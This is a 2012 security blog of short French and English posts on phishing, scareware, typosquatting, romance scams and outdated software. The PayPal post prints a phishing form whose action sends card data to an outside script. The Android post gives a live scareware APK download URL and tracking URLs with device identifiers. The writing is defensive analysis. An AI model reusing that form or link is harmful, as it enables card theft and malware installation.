Overblog
Suivre ce blog Administration + Créer mon blog
29 juillet 2012 7 29 /07 /juillet /2012 13:23

Voici ce que certains navigateurs peuvent afficher lorsque l'on tente d'accéder à son compte en ligne EDF :

 

Capture_site_errHTTPS_290712.JPG

 

Mais en fait, le navigateur n'a pas tort. Et du coup, en respectant les bonnes pratiques de sécurité, côté utilisateur, on ne devrait pas continuer à utiliser ce site...!

Voici l'explication en détail :

EDF_errHTTPS_chrome_29012.jpg

 

En analysant rapidement les sessions HTTP, il appraît que le site génère une connexion vers  http://script. weborama. fr/wbo_performance.js  en HTTP !

Moralité entre publicité/mesure d'audience, et sécurité, il faut parfois choisir.

NB : pour ce cas-là, au final le site peut-être utilisé sans crainte, je n'ai pas relevé de risque pour la transmission des infos confidentielles.

Partager cet article

Repost0
27 juillet 2012 5 27 /07 /juillet /2012 23:03

b1ng.com

 

Capture.JPG

 

bang.com? bung.com?

 

Capture2_bing.JPG

 

 

bing.ws

Capture3_bing.JPG

 

bing.info

Capture4_bing.JPG

 

bing.org = > redirection

Capture5_bing.JPG

 

bing.cc

Capture6_bing.JPG

 

Conclusion, il n'est pas simple de réellement protéger un nom de domaine contre le parasitisme de nom de domaine (cyber/typo suatting).

Partager cet article

Repost0
23 juillet 2012 1 23 /07 /juillet /2012 22:11

Comme indqué ici, http://windows.microsoft.com/fr-FR/windows/downloads/antivirus-partners Windows 8 dispose par défaut de l'antivirus Microsoft nommé par ailleurs Security Essentials, et ici Windows Defender.

Contrairement à autrefois (pour Windows Defender), il s'agit d'un moteur antiviral complet, avec mises à jour régulières et protection temps réel.

 

Cet article va évoqué un problème pouvant survenir avec Windows 8 (au moins la Consumer Preview), et Windows Defender. L'antivirus peut être considéré à un moment donné, sans que le contexte technique soit clair, comme désactivé.

 

Vous aurez dans le cas le message d'avertissement "ancun logiciel anti-espion n'est installé"...

 

alerte_antivirus_W8_230712.png

On notera au passage que Sourcefire Immunet, installé, est bien détecté, mais considéré comme un antivirus courant, visiblement, et pas un "anti-espion".

Justement, Win Defender est censé jouer ce rôle-là...

 

 

Voici ce que cela donne dans le registre :

registre_err_desact_230712.png

En fait, l'explication est là : Windows Defender est désactivé par paramètre du registre.

 

Pour résoudre le problème, il faut rajouter un compte admin local, dans les autorisations, puis Paramètres avancés, et  ajouter le compte voulu dans la liste des comptes autorisés à modifer les autorisations de la clé.

Une fois ceci fait, il ne reste plus qu'à donner le droit à ce compte à modifier la clé "Windows Defender".

 

Maintenant, il suffit juste de changer les 2 valeurs "DisableAntiSpyware" et "DisableAntiVirus", pour les passer à 0 (logique).

 

Dernier point, lancer manuellement Windows Defenfer et cliquer sur "Activer". Et viola (comme disent les Anglais).

 

 

Partager cet article

Repost0
17 juillet 2012 2 17 /07 /juillet /2012 00:02

 L'exemple, réel, m'a tellement plu que je n'ai pas pu m'empêcher de le publier :) (oui, ça faisait un moment que je n'avais pas publié, je sais...).

 

Tout commence par une mise en relation, via Internet... ami d'ami, sites d'événementiel, etc Bref, tout commence bien.

 

C'est alors qu'une demoiselle (je pense ! ) vous approche. Très vite, elle vous demande votre adresse MSN. Pourquoi pas. Bon, je passerai sur le niveau en Français, catastrophique pour ne pas dire honteux. Tellement que cela en deviendrait suspect...   Juste un petit exemple :

le chapeau je t'envoierais çela en france sa serrais un cadeau pour toi

 

La demoiselle donc pose des questions, et monte son scénario. Elle indique être actuellement en Afrique, pour "raisons personnelles", temporaires... et plus précisément en Côte d'Ivoire. Pour ceux qui traînent un peu dans la veille sécurité, le "tilt" du Scam 419 pourrait ne pas être loin, mais bon passons (pour le moment).

 

Bref, la demoiselle indique ne pas avoir de sous, mais par contre souhaiterait... qu'on lui paye le billet (aller-simple, mais bien sûr) pour Paris...! là ça commence à devenir louche.

 

Commençons donc les vérifications.

 

Déjà, petit rappel, MSN étant une forme de P2P, il est facile de renifler le trafic (avec Wireshark ou autre), et trouver l'IP de la personne avec qui l'on cause (hé oui, désolé si un mythe s'effondre...).

wireshark_msn.png

 

on voit bien du trafic MSN, pur, avec le serveur (l'IP appartenant à MSFT), et le trafic MSN qui l'encadre. Voici donc l'IP de la fameuse personne : 213.136.125.178

 

Bon, un petit tour sur RIPE pour voir ?

https://apps.db.ripe.net/search/query.html?searchtext=213.136.125.178&search%3AdoSearch=Search#resultsAnchor

 

Localisation : Côté d'Ivoire, ça semblerait cohérent...

 

Mais ce n'était qu'une première étape. Que disent nos chers moteurs de recherche ? oups....

 

Déjà, le même pseudo est pris, sur d'autres sites : http://www.jecontacte.com/profil/Florencebonheur  dont le thème est clairement affiché... (non, je ne me mettrai pas de capture d'écran :[ ) pas franchement discret de prendre le même pseudo entre sites différents. D'autant plus que Google, lui, indexe tout, et a de la mémoire !

 

Pour confirmer le tout, en 10 min à peine de parlotte, la "damoiselle" se laisse convaincre d'envoyer un email avec une "photo d'elle" (puisqu'elle tient absolument à faire une conversation vidéo... alors qu'elle n'a pas de webcam, elle...)

Bingo, merci les entêtes de messages dans tout bon client de messagerie standard. L'IP émettrice  est:

 

email_entetes.JPG

 

Qu'en dit-on sur le Net ? le couperet tombe assez vite : 

 https://apps.db.ripe.net/search/query.html?searchtext=213.136.125.178&search%3AdoSearch=Search#resultsAnchor

 

Un scam 419, dont l'IP émettrice est la même... et qui date de juin 2012... la coïncidence est troublante, non ?

 

Et encore un signalement, parmi d'autres :

http://www.projecthoneypot.org/ip_213.136.125.178

 

 

 ip honeypot spam

 

NB : Pas de commentaire sur la pub à gauche, je n'y suis pour rien :(

 

Bref, continuons !

 

J'avais oublié : mais qu'elle a l'air jolie la "damoiselle" en photo ! Voyons cela d'un peu plus près....

 

Déjà, sa photo MSN... utilisons une petite banque de données d'images !

recherche_photo_msn.JPG

 

 Hum... bon voyons maintenant les autres photos qu'elle envoie (très facilement) via MSN :

 

recherche_photo1.JPG

 

  Bon, je crois que tout est clair.

 

La photo est en plus utilisée sur plusieurs sites, encore moins discret (et malin).

 

De même, grâce à Google cette fois-ci, dans sa fonction de recherche par image, je suis tombé sur :

https://www.google.com/search?tbs=sbi:AMhZZiseBWnNUan0Bu33pd9jnJl89jrg0VmCdRgBftuz42b_1D_153Mw6naW9jnRqOxvvywJGI3e309JjfmqZA9tbQzDOp34vorFDy9jdfQyUWhSC9S9F9jvYG44WexqcFZ-uNci9gUAF0aekjoVMJfqoXiTC7cW0o-51EMdZABw3OJBmDPkTcDhealO6nx5W9QJNJz36iK7wzxnKoC3lifk72fSg5fK0wOVzi37_1fyyvlpkl-u0FvcQs29-1HPFImZSf7PDkM41Ya3FME_1NTKuuND0lIx8DhdOGe6Dh5nKqP0OKw6WHST5hvOO25u0OsOcd6uRUBv8Q2hYpIqRl-Dj2Rild3Iyy7zdmMUb5_1esOXssT6qwUf5gibiBDRa-KOoWRwCyK0M5sjLaxreoyit-B9TGeMBnupaQEmphLf02zHAmr-NHj8qVyVCDTlnZblWQdakDIAa2Y6FWKQrfAyCUHJahTZFwLTnO-CBBu0sOLE6fGSKsJ4LXcGcU8MNT50V950YjnFUr0sd8OaNxFRwC0l1hLFyKEluetDbX9Qg1z_1ylGiVUc2evMNyPB3Lc5v7o0SzZqQIkebznZ1B5NnPItxw4-rM6Qtazmjh3m6XG-EkdPsmtQOf89EuzT1fQx_1Q_1HNOf5-9fKZO3cHsdg9UDK-8bmfmFv14el6FhL4pwlO6L9sznKRwagrR59GZQH7BgfDO8T80AM9Ipxqa4aurpPFi1SzPVbXcN5_1w_1sURkwOP6WNjmIj6kc75sS85m0-hKHFz5UM4ztyt9ukdlfnR_127mIUQfsVx0EedHN10xbVMURNU3q81poniLgoDLCn_1AH2tznrKo7mbFXTl-RJJNmTBkqO6R31izNfWcNwxKScWCCKws09YYhP1lMiaxctWUbKAZU6L7I9k67vgfdw5qNjL5PkWw4_1klCtU8-uurt95uGcwysPV3_1VgGPED15Fyl1A_1eJVeh5Py1YsqsR5Kh2Ow_1g5eA6OA17w6IoJySnpUvhdF_1JMGlcKuNMHlFqEUu5jeeC_1G-rnsCVak_1HvaZ4JBJLI1s099wzbxpCIkLfRc0QCEfGzivyRJ_1L3NWuhGXbPjs-Ecr0WIwhVjmUV3N6smFDZ0NoDCgZpgJXXpr1HbEiR7nVtQFyr5OFYTDLfBR0HZo9B1b4vxWUKJAaI3w8vsnP64aq9rW4jxMiuXbpfvuF-bimidUVwysdsDmH-rRA7D6lVnB8bKfYQZgKTkR6gB3A5fIZy_1gUiCjlPgqTBzh5Cjy80MUtVEmER1ufIOubcxXj_1rv6HzkzkI1hgmLm996cUJ7gtH4po52dJcKQt0Mjhd1sfgH3HOcQQJDqSi8pffy8d8PlGfM&num=10&hl=en&bih=934&biw=1680

 

Petit échantillon de résultats:

http://www.romancescam.com/forum/viewtopic.php?p=5708

Bref, le phénomène ne serait pas nouveau (et j'ai même de nouvelles photos en prime :( ).

 

Qu'oubliais-je... ha oui, le fin du fin. Avec le même site (TinEye), et une autre photo, je suis remonté à... ça : http://gallerydbase.com/mm/mm-lakergame/pichunter.html

Et là, je n'ose même pas mettre de capture d'écran ! On notera au passage qu'il ne s'agit vraisemblablement pas de la même personne...

 

 Bref, internautes, vous voilà prévenus.

 

Plus sérieusement :

- encore une raison de réfléchir au contrôle de l'accès aux réseaux sociaux en entreprise

- encore une raison de pousser des campagnes de sensibilisation

- encore une raison de contribuer à la sécurité globale en signalant ce qui est suspect !

 

Mise à jour, 17/07/12:

Merci à la PLCC d'avoir bien voulu prendre en compte mon signalement.

Partager cet article

Repost0
5 juin 2012 2 05 /06 /juin /2012 17:12

 

 

Capture_paypal_050612.PNG

 

The malicious code is: <form method="post" id="ccForm" action="http://mix4.top8.com/lol/coco-stor.php" name="ccForm" class="" onsubmit="return verif_formulaire()"> 

 

Not detected by most browsers: Opera, IE,....

Partager cet article

Repost0
4 avril 2012 3 04 /04 /avril /2012 00:07

 

The mobile malware (are we gonna call it mobalware someday?) fashion seems to copy the regular malware one... maybe somewhat a little bit faster.

 

Anyway, I was keen on an app aiming to improve standard Android  SMS reader/writer. The app is called ChompSMS. There is a free version, and a paid version. I'm going to talk here about the free one.

 

One day, recently, I noticed the add being displayed while browsing the SMS had changed.

 

 Here are a few examples of the banners I find interesting:

 

batt_-banner1_chompSMS_annon.png

 

batt_banner2_ChomSMS_annon.png

 

 

batt_banner3_chompSMS_annon.png

 

 

See the banner right in the bottom of the screen?

So, if I click on it, the real part begins.

 

batt2.png

 

 

Obviously, I will not have the choice here... only the orange button ("next"). This is what I'm here for: let's click on it!

 

 

 batt_alert2_040412.png

 

The displayed instructions are worth reading :)  everything is done to convince the user to download, install, and activate whatever is gonna be downloaded... and by the way, they also recommend to enable "unknown sources" of software...!

 

What about the antivirus? well, not bad on that one.

Webroot will indeed detect and alert:

webroot_alert1_040412.png 

And DrWeb will do the same:

 

drweb_alert1_040412.png 

Note that even the file name is thoroughly defined: "battery_upgrade--tap_to_start", even with a reminder : "tap to start"!

 

Now, where does this come from?

Let's watch the network traffic that ChompSMS generates just after having opened/launched:

HTTP_trafic_CHompSMS_Ads_040412.png 

 Bingo, here is the real and complete ad URL:

http://www.mmnetwork.mobi/s.php?sig=5942e84d7db11dc54eda6157a3c2bc7a&adid=480&banner=320_50&cid=89&advid=846&e=c8&d=92888&f=m&ua=Mozilla%2F5.0+%28Linux%3B+U%3B+Android+2.3.3%3B+fr-fr%3B+GT-I9100+Build%2FGINGERBREAD%29+AppleWebKit%2F533.1+%28KHTML%2C+like+Gecko%29+Version%2F4.0+Mobile+Safari%2F533.1

It will return the exact banner we have seen at the bottom of the ChompSMS screen just above.

But having a look at the URL reveals something else:

- OS version, generic:  value here is "linux" 

- OS version, detailed: Android 2.3.3

- local language: fr-fr

- build version: Gingerbread

- browser rendering engine: AppleWebkit, 533.1?

- browser compatibility: KHTML like Gecko version 4.0

- browser internal name: Mobile Safari,  533.1?

All I can say so far, except that this is a real fingerprint of the device, is this will allow the ad (and the scareware) to target devices configurations, and be more efficient.

Same thing for this other URL:

http://ads.mojiva.com/ad?site=14717&ua=Mozilla%2F5.0+%28Linux%3B+U%3B+Android+2.3.3%3B+fr-fr%3B+GT-I9100+Build%2FGINGERBREAD%29+AppleWebKit%2F533.1+%28KHTML%2C+like+Gecko%29+Version%2F4.0+Mobile+Safari%2F533.1&ip=82.237.173.18&count=1&key=1&zone=19352&url=&premium=1&over_18=0&&udid=848053C87A05BDEB3EE36C8919CD4CD1&type=6  

 

Then when we click the ad system will display a first picture, as an ad:

http://admarvel.s3.amazonaws.com/ads/c46767/13307072869253_UNL_st2_480x600_FR_everything.gif

13307072869253_UNL_st2_480x600_FR_everything.gif 

 

And even a second one!

http://admarvel.s3.amazonaws.com/ads/c48174/13317172538745_LYRICPLAY_FR_480X600.gif

13317172538745_LYRICPLAY_FR_480X600.gif
 

Then the ad system will do something I guess to be a "call home":

http://107.22.117.140/fam/ck.php?p=__pid=ef8a30b841b36346__sid=14488__bid=352249__cb=0654201044__h=1333491475__uid=292b5557482687e4__s=7789be62e6c35a07fe085f54d7d9fe26

http://107.22.117.140/fam/view.php?p=__pid=ef8a30b841b36346__sid=14488__bid=352249__cb=c32f363568__h=1333491475__uid=292b5557482687e4__s=782405e716ee038035c5457a2cb05672

 

http://adserver.adtechus.com/addyn/3.0/5326.1/2335977/0/0/ADTECH;noperf=1;loc=100;ip=82.237.173.18;key=Samsung_Galaxy+S2;kvip=82.237.173.18;kvcarrier=;misc=1333492265028;target=_self;kvmedition=$edition;kvos=Android;sub1=99f50d6b93f7d3f36b56c4d082a57a135d92caf8;sub2=8ADD4216FF9A40854591929EB3BC02CC081EA2FE;sub3=6568cf499469dbc79707fba422cfd36f;sub4=848053C87A05BDEB3EE36C8919CD4CD1;
 

I can even see here the mobile IP address, and the model (Galaxy S2! 


Last, but not least, the download will start:

Url: https://s3.amazonaws.com/battery.supercharge/downloads/m--france--2012-03-28.a-en-9.apk?AWSAccessKeyId=AKIAIADYPOKA37DVGHGQ&Expires=1649026622&response-content-disposition=attachment;%20filename=Battery_Upgrade--Tap_to_Start.apk&response-content-type=application/vnd.android.package-archive&Signature=TZCWnCk5wbn%2BeoL1WCkcqfky3pw%3D FileName: /mnt/sdcard/.downloadTemp/Battery_Upgrade--Tap_to_Start.apk  

 

About the file?

VirusTotal says 7 AV our of 42 detect it...

SHA1: afdf9c78e0e1bc41192664ba3040908c18d72a3a
MD5: 1e67b070accd8d71024f240504b59140
File size: 529.3 KB ( 541956 bytes )
File name: Battery_Upgrade--Tap_to_Start.apk
File type: Android
Detection ratio: 7 / 42
Analysis date: 2012-04-03 23:28:47 UTC ( 3 minutes ago )

 

https://www.virustotal.com/file/6e129566f5139532c18779ae96c4f228a15d27032081d46f486ae029c4d6dce7/analysis/1333495727/

 

 More to come... 

Partager cet article

Repost0
2 février 2012 4 02 /02 /février /2012 23:58

Let's say that you start an old box, even a WinXP... that had not been used for a while.

Because you're aware of security risks if you don't update your software, you try to update the whole stuff. Windows Updates works like a charm, and may deploy 100 updates with 1 or 2 reboots, okay fine.

But... for some other products, it's not that simple.

 

On the machine, there is an old Firefox 3.0.15. First, it did upgrade itself to 3.0.19, okay. But then, things begin to be more complicated.

 

Firefox does warn there is an available upgrade... version 3.6.13. Okay, but, it's not able to download and install it! And were now at version 9... will I have to install every major versions, one after the other?


Anyway, let's see what happens.

 

The Wireshark screenshot below says it all, while checking for available updates through the "?" menu:

firefox3_MaJ_HS_1_020212.JPG

 

The request contains every relevant information that is needed:

GET /?product=firefox-3.6.13-complete&os=win&lang=fr&force=1 HTTP/1.1\r\n

 

So yeah, the upgradable version is a 3.6.13, running under Windows, localization France, and a complete download may be required. Fine.

But... the server's response is not what one could expect:

"HTTP 404 not found"!

 

Even worse, the users gets a quite non-understandable message:

firefox3_err_1_020212.JPG

[quick English translation]

Software upgrade - end.

Failure (unkwown reason)

 

I'm afraid a lambda user will not know what to do...

 

Therefore, unless the user does go to mozilla.org and downloads the new version on his own, which is most likely not gonna happen most of the time for lambda users, Firefox will remain stuck at this old version, 3.0... This, including security holes that were fixed in later versions!


Mozilla said they were gonna keep on providing support for 3.6 version. That could be smart, in such a situation, but only if the upgrade from older versions is still possible.

 

Mozilla dev: please don't forget that 100% of the "computer world" does not run even the N-1 version of Firefox! some machines have not been able to upgrade for a while, and will thus remain at an obsolete and insecure state!

 

To admins: I suggest you to check your proxy logs to see if some machines are not trying to upgrade from old versions of Firefox... or even better: build your own internal repository for Firefox, that's really the best solution to keep your park under control. Within that repo, keep old versions of Firefox to let machines with old configurations upgrade with less problems!

You may also want to deploy it with your own remote install solutions, in that case make sure the package intelligence will look for all old versions of Firefox to properly uninstall them...

 

Last, don't forget that a software being spread all over a park, but without any real central & automated management, does bring a global risk to the IT. Even if Firefox was secure at a time, leaving it on the machines, without properly managed upgrade, will create a risk (attacks based on security holes, that were patched, but patches not deployed to all the machines).

This is the case for any software, in fact, but above all for browsers since users access Internet content through them.

 

 

Update 1: 02/05/12

 

This issue is quite the same for Thunderbird...

 

Thund_MaJ_030212.JPG

 

The updater tries to download the 3.1.10 version, but fails (still getting a "404 not found" from Moz' servers). But the thing is with Thunderbird, the user is not likely to go to "Mozilla Google start page", that will tell him his Thunderbird is obsolete and has to be upgraded!

 

Thus, admins need to manually control Firefox/Thunderbird upgrades. But this is also true for lambda users, that are not professionals...

Partager cet article

Repost0
2 février 2012 4 02 /02 /février /2012 23:48

Un antivirus est censé protéger contre un maximum de menaces, oui... surtout dans le nuage, avec toutes les problématiques de cela pose.

Hé bien là, non, dans le nuage, la protection ne joue pas...

immunet1_020212.JPG

 

immunet2_020212.JPG

 

Trève de plaisanterie... je me demande par contre comment est estimé le nombre de menaces contre lesquelles la solution antivirale protège, avec la problématique des détections heuristiques/génériques/etc.

 

Partager cet article

Repost0
20 janvier 2012 5 20 /01 /janvier /2012 23:37

Je ne dois pas être le seul à l'avoir vu, l'opérateur en fait l'annonce sur son portail dès l'instant que l'on rentre dans la partie "webmail"...

 

pub_zimbra_210112.PNG

 

Mais le problème est que l'infra Zimbra en question ne semble pas elle aussi neuve :

conf-PHP_200112.PNG

 

 D'après le site éditeur de PHP, cette version 5.2 n'est plus supportée...

php_210111.PNG

Et évidemment, elle souffre de diverses failles de sécurité... que je ne détaillerai pas publiquement par principe !

Messieurs les admins et intégrateurs à Free, c'est à vous de jouer... 

 

Mise à jour 1 :

Je n'avais même pas songé à vérifier mais en fait l'URL d'accès à une boîte aux lettres chez Free est en HTTP !

Exemple :

http://imp.free.fr/horde/imp/mailbox.php?mailbox=INBOX&actionID=

acces_HTTP_210112.PNG 

Cela ne respecte pas les bonnes pratiques de sécurité pour les sites Internet... mais surtout, de nombreuses attaques sont possibles (empoisonnement ARP, détournement DNS, écoute simple, etc) ! 

Partager cet article

Repost0
14 janvier 2012 6 14 /01 /janvier /2012 13:24

An old-fashion IM bot, but this time over GTalk...

Here is the chat: 

 

loveflor3
hey whats up? 23/F here. youu?
moi
Sunny. Thx
loveflor3
hmm. have we chattted before?
moi
Yes
loveflor3
oh ok. l wasn't sure. anywayz.... whats up?
12:29
loveflor3
hello?
12:58
moi
yes
I'm having lunch
loveflor3
im Iikee so boreeddd.... there iss nothinggggg too do
moi
what's your name?
loveflor3
ohhh waiit! i have a greatt idea. have u eveer watched a sexyy girI Iike me striip Iive on a cam before?
moi
lol
loveflor3
wellIIl.... u couId watcch me strrip if u wouId Iike?
moi
no
loveflor3
yeah? okk weIl my cam is setuup through this webbsite so that i can't bee recorded so u have too signupp there.
it onIyy takes a minnute and it is freee. ok?
moi
we'll see
loveflor3
http://twurl.nl/yudz1w goo therre then up at thhe top of the paage cIlick on the goIldish JOIN FREE buttton.
The shortened URL will redirect the user to: 
https://www.becoquin .com/aff.php?dynamicpage=find2_fr&profiles=set1&a_aid=20cb8cf6&mundomreg=fr&data1=CD5407 
Wow, even HTTPS available! in order to make the user feel better?

capture_site_14012012.png
As you can see, the server runs NginX (but does not hide the version within the HTTP headers, sic), and is most likely be hosted in France...
On the other hand, WOT (Web Of Trust) does warn about it:

WOT_becoquin.com_14012012.png

 

Partager cet article

Repost0